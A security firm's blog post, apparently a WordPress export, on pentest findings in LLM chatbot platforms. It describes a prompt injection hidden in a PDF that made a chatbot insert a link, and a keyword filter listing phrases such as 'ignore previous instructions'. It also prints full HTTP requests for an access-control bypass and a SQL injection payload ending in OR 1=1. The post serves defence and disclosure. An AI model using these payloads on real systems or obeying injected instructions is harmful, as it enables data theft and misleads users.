{"id":63165,"date":"2026-01-09T13:13:51","date_gmt":"2026-01-09T12:13:51","guid":{"rendered":"https:\/\/www.usd.de\/?p=63165"},"modified":"2026-01-09T13:13:53","modified_gmt":"2026-01-09T12:13:53","slug":"ai-chatbots-pentests-vulnerabilites-llm-platforms","status":"publish","type":"post","link":"https:\/\/www.usd.de\/en\/ai-chatbots-pentests-vulnerabilites-llm-platforms\/","title":{"rendered":"Assessing the Security of AI Chatbots: Pentests Uncover Critical Vulnerabilities in LLM Platforms"},"content":{"rendered":"\n<p><a href=\"https:\/\/www.usd.de\/en\/security-consulting\/ai\/\" data-type=\"link\" data-id=\"https:\/\/www.usd.de\/en\/security-consulting\/ai\/\">Artificial intelligence<\/a> (AI) is transforming the business world. Large language model (LLM) platforms in particular are increasingly finding their way into companies across a wide range of industries. Many are choosing in-house hosted solutions to protect sensitive data and maintain control over their information. This ensures that internal data is not used as training material for public models such as ChatGPT or Gemini.<\/p>\n\n\n\n<p>However, as usage grows, so do security requirements. To meet these requirements, our security analysts at <a href=\"https:\/\/herolab.usd.de\/en\/\" data-type=\"link\" data-id=\"https:\/\/herolab.usd.de\/en\/\" target=\"_blank\" rel=\"noopener\">usd HeroLab<\/a> combine proven methods from <a href=\"https:\/\/www.usd.de\/en\/pentest\/pentest-webapplications\/\" data-type=\"link\" data-id=\"https:\/\/www.usd.de\/en\/pentest\/pentest-webapplications\/\">web application pentesting<\/a> with in-depth expertise in LLM-based platforms. 
In recent months, they have thoroughly analyzed numerous platforms and identified recurring vulnerabilities.<\/p>\n\n\n\n<p>In this blog post, our colleagues Gerbert Roitburd and Florian Kimmes show which three classes of vulnerabilities they encountered most frequently, what risks these vulnerabilities pose, and explain their impact using real-world findings to illustrate how attackers can exploit them in practice.<\/p>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Prompt injections are among the most well-known vulnerabilities of LLM platforms<\/h2>\n\n\n\n<p>Prompt injections occur when user input is accepted into the system prompt or retrieval chain without being checked. This allows attackers to manipulate the model's original instructions either by adding to them or overwriting them completely. The result: the model performs actions that are neither intended nor desired. Our analysts regularly encounter this vulnerability in pentests. They were able to successfully demonstrate prompt injections in numerous LLM platforms. The following vulnerability demonstration illustrates the concrete effects of such manipulation:<\/p>\n\n\n\n<p>In a test system, users were allowed to upload documents whose content was then incorporated into the response generation. To demonstrate the vulnerability, our analysts prepared a PDF document with a malicious instruction in white text on a white background. This meant that the instruction was only visible to the LLM, but not to the users. 
Our PDF file looked like this:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.usd.de\/wp-content\/uploads\/Promt-Injection-LLM-1_KI-Chatbot.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"675\" height=\"369\" src=\"https:\/\/www.usd.de\/wp-content\/uploads\/Promt-Injection-LLM-1_KI-Chatbot.jpg\" alt=\"\" class=\"wp-image-63108\" style=\"width:550px\" \/><\/a><\/figure>\n\n\n\n<p>After the upload, the text extracted from the PDF was inserted into the system prompt, overwriting the developer's instruction. As a result, the injected link actually appeared in the AI chatbot's responses. By injecting a malicious prompt, attackers can, for example:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Insert phishing links<\/li>\n\n\n\n<li>Bypass security policies<\/li>\n\n\n\n<li>Force liability-relevant or legally binding statements<\/li>\n\n\n\n<li>Cause the disclosure of internal information<\/li>\n\n\n\n<li>Manipulate downstream workflows if responses are processed automatically<\/li>\n<\/ul>\n\n\n\n<p>There is currently no infallible mitigation against prompt injections. They represent an inherent risk of the underlying technology, as LLMs are by design unable to distinguish between system instructions and user input. Nevertheless, a number of techniques can reduce the likelihood of successful prompt injection attacks or mitigate their effects.<\/p>\n\n\n\n<p><strong>Our analysts recommend: <\/strong>A golden rule when using LLM platforms: The LLM must never have access to more or higher-privileged resources than the users themselves. In other words, the language model must never serve as an access restriction for functions or information. 
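<\/p>\n\n\n\n<p>One common mitigation is to screen each question\/answer pair before the response is released. The sketch below is purely illustrative: the keyword heuristic and all names are hypothetical stand-ins for a call to a separate judge model.<\/p>

```python
# Sketch of a screening pass over each question/answer pair before the
# answer is released to the user. NOTE: the keyword check below is only
# a placeholder for a real call to a second, separate model.
SUSPICIOUS_MARKERS = (
    "ignore previous instructions",
    "append the following link",
    "reveal the system prompt",
)

def looks_malicious(user_input: str, model_output: str) -> bool:
    """Placeholder verdict; in practice a second model would judge the pair."""
    pair = (user_input + " " + model_output).lower()
    return any(marker in pair for marker in SUSPICIOUS_MARKERS)

def guarded_answer(user_input: str, raw_output: str) -> str:
    """Release the model output only if the screening pass raises no objection."""
    if looks_malicious(user_input, raw_output):
        return "This request was blocked by the content policy."
    return raw_output
```

<p>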
To reduce the likelihood of a successful attack, the outputs of the LLM can be checked using an additional \u201cguardrail LLM.\u201d User inputs and model outputs are passed to the guardrail LLM, which decides whether a question\/answer pair is malicious in nature.<\/p>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Broken access control remains the most significant vulnerability in web applications and also affects LLM platforms<\/h2>\n\n\n\n<p>Since 2021, this vulnerability has ranked first in the <a href=\"https:\/\/owasp.org\/www-project-top-ten\/\" data-type=\"link\" data-id=\"https:\/\/owasp.org\/www-project-top-ten\/\" target=\"_blank\" rel=\"noopener\">OWASP Top 10 for web applications<\/a>. Our penetration tests show that LLM platforms are not exempt, as confirmed by the <a href=\"https:\/\/genai.owasp.org\/llm-top-10\/\" data-type=\"link\" data-id=\"https:\/\/genai.owasp.org\/llm-top-10\/\" target=\"_blank\" rel=\"noopener\">OWASP Top 10 for LLM platforms and generative AI<\/a>. Many LLM platforms allow users to store personal assistants, chat histories, or user-defined system prompts. However, if role and permission checks are incomplete, attackers can access sensitive data.<\/p>\n\n\n\n<p>The cause usually lies in insecurely developed or incorrectly configured authentication and authorization logic. As a result, access to confidential resources is not adequately controlled, sometimes with serious consequences: data can be viewed, modified, or even deleted.<\/p>\n\n\n\n<p>A concrete example from our pentests shows how easy this vulnerability can be to exploit. As regular users, our analysts were able to manipulate other users' chatbots without the appropriate authorization. 
First, we queried the available models:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"html\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">GET \/v2\/chat\/availableModels HTTP\/2\nHost: example.com\nAuthorization: Bearer ey[REDACTED]\n[...]<\/pre>\n\n\n\n<p>The HTTP response listed exactly the two models the user had access to, Test Model and Default Model, each with a numeric ID. Since these IDs are assigned in ascending order, the IDs of further models could simply be guessed. The guessed models could then be modified, for example by adding users.<\/p>\n\n\n\n<p>The request to edit the model with the ID 134 in order to authorize an additional user can be made as follows:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"24,26\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">POST \/v2\/studio\/skills\/update\/134 HTTP\/2\nHost: example.com\nContent-Length: 532\nSec-Ch-Ua-Platform: \"Linux\"\nAuthorization: Bearer ey[REDACTED]\nContent-Type: application\/json\n[ ... 
]\n{\n\"_id\": \"134\",\n\"availability\": {\n\"allUsers\": false,\n\"domain\": \"\",\n\"groups\": [],\n\"onDemand\": false,\n\"users\": [\n\"8a06a98e-be31-46ed-9fa1-44b15dbc7633\"\n]\n},\n\"deployment\": \"gpt-4o-mini\",\n\"description\": \"SampleDescription\",\n\"icon\": \"sms\",\n\"meta\": {\n\"created\": 1740586740.77619,\n\"owner\": \"m-rvwo-ncrw17ty-fdqo96-i75w\",\n\"updated\": 1740587027.443857,\n\"contributors\": [\n\"m-rvwo-ncrw17ty-fdqo96-i75w\"\n]\n},\n\"settings\": {\n\"example\": \"\",\n\"negative\": \"\",\n\"personalization\": false,\n\"positive\": \"\",\n\"skillContext\": \"\",\n\"knowledge\": null\n},\n\"title\": \"Custom skill1\",\n\"api_keys\": []\n}<\/pre>\n\n\n\n<p>Within the request, the owner and the user who should have access to the model were specified. The API accepted the request and returned the following message:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">HTTP\/2 200 OK\nDate: Wed, 26 Feb 2025 16:49:10 GMT\nContent-Type: application\/json\n[ ... 
]\n{\"response\":\"Skill updated\",\"result\":true}<\/pre>\n\n\n\n<p>The available models can then be queried again with the initial HTTP request:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">GET \/v2\/chat\/availableModels HTTP\/2\nHost: example.com\nAuthorization: Bearer ey[REDACTED]\n[...]<\/pre>\n\n\n\n<p>From now on, the model with ID 134 is also accessible to the newly added user:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">HTTP\/2 200 OK\nDate: Wed, 26 Feb 2025 16:51:23 GMT\nContent-Type: application\/json\nContent-Length: 329\nAccess-Control-Allow-Credentials: true\n{\n\"response\": [\n{\n\"defaultModel\": false,\n\"description\": \"Test Model\",\n\"icon\": \"sms\",\n\"id\": \"130\",\n\"image\": true,\n\"name\": \"\"\n},\n{\n\"defaultModel\": true,\n\"description\": \"Default Model\",\n\"icon\": \"sms\",\n\"id\": \"132\",\n\"image\": true,\n\"name\": \"GPT 4o mini\"\n},\n{\n\"defaultModel\": false,\n\"description\": \"SampleDescription\",\n\"icon\": \"sms\",\n\"id\": \"134\",\n\"image\": true,\n\"name\": \"GPT 4o mini\"\n}\n],\n\"result\": true\n}<\/pre>\n\n\n\n<p>Attackers can thus edit all other models within the application. This also applies to models created by other users that contain sensitive information such as documents. These models then become visible and accessible to unauthorized users.<\/p>\n\n\n\n<p><strong>Our analysts recommend:<\/strong> Every action within the web application must be secured by a reliable authorization check. In particular, access to sensitive content and functions must be restricted to authorized users only. 
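<\/p>\n\n\n\n<p>A minimal sketch of such a server-side check is shown below. All names are hypothetical; the point is that the stored owner, not any field of the incoming request body, decides whether an update is allowed.<\/p>

```python
# Hypothetical sketch of a server-side ownership check for an update
# endpoint such as /v2/studio/skills/update/<id>. The stored owner,
# not the request body, determines whether the change is permitted.
class Forbidden(Exception):
    """Raised when the requester is not authorized for the action."""

# In-memory stand-in for the skill store; ID "134" mirrors the example above.
SKILLS = {"134": {"owner": "m-rvwo-ncrw17ty-fdqo96-i75w", "title": "Custom skill1"}}

def update_skill(skill_id: str, requester_id: str, changes: dict) -> dict:
    """Apply changes only if the authenticated requester owns the skill."""
    skill = SKILLS[skill_id]
    if requester_id != skill["owner"]:  # enforced on every single request
        raise Forbidden("requester does not own this skill")
    skill.update(changes)
    return skill
```

<p>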
Access should be implemented using an access matrix or a global access control mechanism.<\/p>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:70%\">\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>LLM platforms bring new challenges: Traditional pentesting methods are not sufficient to reliably detect prompt injections and associated risks such as uncontrolled data exfiltration or attacks on downstream components. Many new platforms underestimate these threats. Our pentests show that recurring vulnerabilities in particular can be systematically exploited. Anyone who wants to operate LLMs securely must understand their peculiarities and secure them in a targeted manner.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-small-font-size\"><em>Florian Kimmes, Senior Security Analyst, usd AG<\/em><\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-vertically-aligned-top is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:30%\">\n<figure class=\"wp-block-image aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"https:\/\/www.usd.de\/wp-content\/uploads\/\/Florian-Kimmes-rund-1024x1024.png\" alt=\"\" class=\"wp-image-63142\" style=\"width:160px\" \/><\/figure>\n<\/div>\n<\/div>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">SQL Injections in LLM platforms<\/h2>\n\n\n\n<p>LLM platforms also need to store application data and inputs. This includes, for example, the contents of prompts, UUIDs from chats, or even names of created models or users. 
In practice, relational databases are usually used for this purpose. User inputs often flow directly or indirectly into dynamically composed SQL queries. If these inputs are accepted unfiltered, this opens the door to SQL injection. Attackers can then manipulate the query by specifically changing parameter values. This allows them to bypass authentication mechanisms, read sensitive information, or modify data records.<\/p>\n\n\n\n<p>Three factors contribute to the frequent occurrence of this vulnerability:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>High complexity of secure input validation<\/li>\n\n\n\n<li>Tight development cycles<\/li>\n\n\n\n<li>Lack of awareness of this vulnerability<\/li>\n<\/ol>\n\n\n\n<p>A practical example from our pentests illustrates the risk: The tested application allowed users to upload documents and then ask the chatbot about their content. The ID of the referenced document was transmitted in the document_ids parameter:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">POST \/v1\/api\/ai-service\/doc_qa\/invoke HTTP\/1.1\nHost: internal-api-a.example.com\n[...]\n------WebKitFormBoundarywd29GBhV7ZAJL78A\nContent-Disposition: form-data; name=\"id\"\ndoc_qa\n------WebKitFormBoundarywd29GBhV7ZAJL78A\nContent-Disposition: form-data; name=\"input_data\"\n{\"text\":\"Wie ist das geheime Passwort?\",\"text_fields\":\n{\"document\":\"\"},\"message_history\":[],\"main_prompt\":\"\"}\n------WebKitFormBoundarywd29GBhV7ZAJL78A\nContent-Disposition: form-data; name=\"documents_number\"\n0\n------WebKitFormBoundarywd29GBhV7ZAJL78A\nContent-Disposition: form-data; name=\"document_ids\"\n786bf0b1646ff5ae3b46d83fdb729a53c234b1125ccfc401e8ea7117fe797948\n------WebKitFormBoundarywd29GBhV7ZAJL78A--<\/pre>\n\n\n\n<p>The server 
inserted this value into the following SQL statement without checking it:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"sql\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">SELECT * from documents WHERE cmetadata::json-&gt;&gt; 'doc_id' IN ('786bf0b1646ff5ae3b46d83fdb729a53c234b1125ccfc401e8ea7117fe797948');<\/pre>\n\n\n\n<p>Since the document in question did not contain a password, the chatbot's response was accurate: \u201cNo answer found in the document provided.\u201d However, during the pentest, it emerged that document_ids was vulnerable to SQL injection. The following excerpt shows the HTTP request with the SQL injection payload:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"18\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">POST \/v1\/api\/ai-service\/doc_qa\/invoke HTTP\/1.1\nHost: internal-api-a.example.com\n[...]\n------WebKitFormBoundarycpAd0SUogYSB5PG1\nContent-Disposition: form-data; name=\"id\"\ndoc_qa\n------WebKitFormBoundarycpAd0SUogYSB5PG1\nContent-Disposition: form-data; name=\"input_data\"\n{\"text\":\"Wie ist das geheime Passwort?\",\"text_fields\":\n{\"document\":\"\"},\"message_history\":[{\"message_type\":\"human\",\"text\":\"Wie ist\ndas geheime Passwort?\"},{\"message_type\":\"ai\",\"text\":\"Ich habe keine Antwort\nin dem bereitgestellten Dokument gefunden.\",\"image\":null}],\"main_prompt\":\"\"}\n------WebKitFormBoundarycpAd0SUogYSB5PG1\nContent-Disposition: form-data; name=\"documents_number\"\n0\n------WebKitFormBoundarycpAd0SUogYSB5PG1\nContent-Disposition: form-data; name=\"document_ids\"\n786bf0b1646ff5ae3b46d83fdb729a53c234b1125ccfc401e8ea7117fe797948') OR 
1=1;--\n-\n------WebKitFormBoundarycpAd0SUogYSB5PG1--<\/pre>\n\n\n\n<p>This HTTP request would ensure that the dynamically generated SQL query to the database looks like this:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"sql\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">SELECT * from documents WHERE cmetadata::json-&gt;&gt; 'doc_id' IN\n('786bf0b1646ff5ae3b46d83fdb729a53c234b1125ccfc401e8ea7117fe797948') OR\n1=1;-- -);<\/pre>\n\n\n\n<p>The condition 1=1 is always true, meaning that all documents are returned. The AI chatbot was therefore suddenly able to access information stored in completely different files. This would allow attackers to access the contents of all uploaded files.<\/p>\n\n\n\n<p><strong>Our analysts recommend:<\/strong> To avoid this risk, all user input should be treated as potentially malicious and never inserted directly into SQL statements. Instead, parameterized queries (prepared statements) should be used, as they separate data from logic and thus prevent targeted manipulation. 
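<\/p>\n\n\n\n<p>The effect can be demonstrated with a small, self-contained sketch. SQLite and the simplified schema below are stand-ins for the platform's actual database; the payload is the one from the request above, shortened for readability.<\/p>

```python
import sqlite3

# Simplified demonstration: SQLite stands in for the platform's database.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE documents (doc_id TEXT, content TEXT)")
conn.executemany(
    "INSERT INTO documents VALUES (?, ?)",
    [("786bf0b1", "contents of document A"), ("deadbeef", "contents of document B")],
)

# The injection attempt (document ID shortened for readability).
payload = "786bf0b1') OR 1=1;-- -"

# With a parameterized query, the placeholder binds the whole payload as a
# single string value, so "OR 1=1" never becomes part of the SQL statement.
rows = conn.execute(
    "SELECT content FROM documents WHERE doc_id IN (?)", (payload,)
).fetchall()
# The malicious value matches no document, so no rows come back.
```

<p>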
In addition, server-side input validation should be implemented to prevent unwanted or incorrect inputs.<\/p>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">What do you need to consider with AI chatbots?<\/h2>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-vertically-aligned-bottom is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:70%\">\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>In addition to securing AI systems, well-known vulnerabilities remain a significant attack vector and therefore continue to be relevant. A web application penetration test can help to identify these vulnerabilities reliably. In addition, we can draw on specialist knowledge of typical vulnerabilities in LLMs and apply this knowledge specifically in our AI projects.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-small-font-size\"><em>Gerbert Roitburd, Managing Consultant IT Security, usd AG<\/em><\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-vertically-aligned-top is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:30%\">\n<figure class=\"wp-block-image aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"https:\/\/www.usd.de\/wp-content\/uploads\/\/Gerbert-Roitburd-rund-1024x1024.png\" alt=\"\" class=\"wp-image-63145\" style=\"width:160px;height:auto\" \/><\/figure>\n<\/div>\n<\/div>\n\n\n\n<p>Do you want to improve the security of your LLM platform? 
<a href=\"https:\/\/www.usd.de\/en\/contact-form-analysis-pentests\/\" data-type=\"link\" data-id=\"https:\/\/www.usd.de\/en\/contact-form-analysis-pentests\/\">Contact us<\/a>, we will support you.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Artificial intelligence (AI) is transforming the business world. Large language model (LLM) platforms in particular are increasingly finding their way into companies across a wide range of industries. Many are choosing in-house hosted solutions to protect sensitive data and maintain control over their information. This ensures that internal data is not used as training material [&hellip;]<\/p>\n","protected":false},"author":117,"featured_media":63102,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"off","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"categories":[14846,373,374,10757],"tags":[14452,14938,14457,14935,14936,14939,14937,14940,378,5613,5715,14941,14942],"class_list":["post-63165","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ai","category-news-en","category-pentests-security-analyses-en","category-usd-herolab-en","tag-ai-en","tag-ai-chatbot","tag-ki-en","tag-ki-chatbot","tag-llm","tag-llm-platforms","tag-llm-plattformen","tag-penetration-testing","tag-pentest-en","tag-web-application-2","tag-web-application-pentest","tag-webapplikationen","tag-webapplikationen-pentest"],"_links":{"self":[{"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/posts\/63165","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/users\/117"}],"replies":[{"embeddable":tru
e,"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/comments?post=63165"}],"version-history":[{"count":5,"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/posts\/63165\/revisions"}],"predecessor-version":[{"id":63221,"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/posts\/63165\/revisions\/63221"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/media\/63102"}],"wp:attachment":[{"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/media?parent=63165"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/categories?post=63165"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/tags?post=63165"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}